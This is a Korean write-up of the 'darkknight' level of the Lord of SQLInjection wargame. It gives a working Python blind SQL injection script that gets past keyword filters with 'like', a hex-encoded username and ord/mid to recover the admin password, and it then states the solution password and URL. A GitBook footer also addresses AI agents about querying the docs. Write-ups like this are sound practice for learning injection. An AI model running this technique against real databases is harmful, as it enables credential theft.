> For the complete documentation index, see [llms.txt](https://donghyunlee.gitbook.io/write-up/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://donghyunlee.gitbook.io/write-up/wargame/lord-of-sqlinjection/darkknight.md).

# darkknight

첫 화면이다.

![](/files/-M-53CoA__Z_1-i2cEgy)

파이썬 코드를 짜면 아래와 같다.

```python
import requests

URL = 'https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php'
PHPSESSID = 'MY_PHPSESSID'
TRUE_PHRASE = 'Hello admin'


def query(payload):
    params = {'no': payload}
    cookies = {'PHPSESSID': PHPSESSID}
    r = requests.get(URL, params=params, cookies=cookies)
    content = r.text
    return TRUE_PHRASE in content


# 8
def find_pw_length():
    pw_len = 1
    while query("0 or id like 0x61646d696e and length(pw) like {}".format(pw_len)) is False:
        pw_len += 1
    print('pw_len: {}'.format(pw_len))
    return pw_len


# 0b70ea1f
def find_pw():
    pw_len = find_pw_length()
    pw = ''
    for pos in range(1, pw_len + 1):
        for character in range(0, 128):
            if query("0 or id like 0x61646d696e and ord(mid(pw,{},1)) like {}".format(pos, character)) is True:
                pw += chr(character)
                break
    print('pw: {}'.format(pw))


find_pw()
```

실행결과, pw는 `0b70ea1f` 이다.

<https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php?pw=0b70ea1f> 에 접속하면 문제가 풀린다.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://donghyunlee.gitbook.io/write-up/wargame/lord-of-sqlinjection/darkknight.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.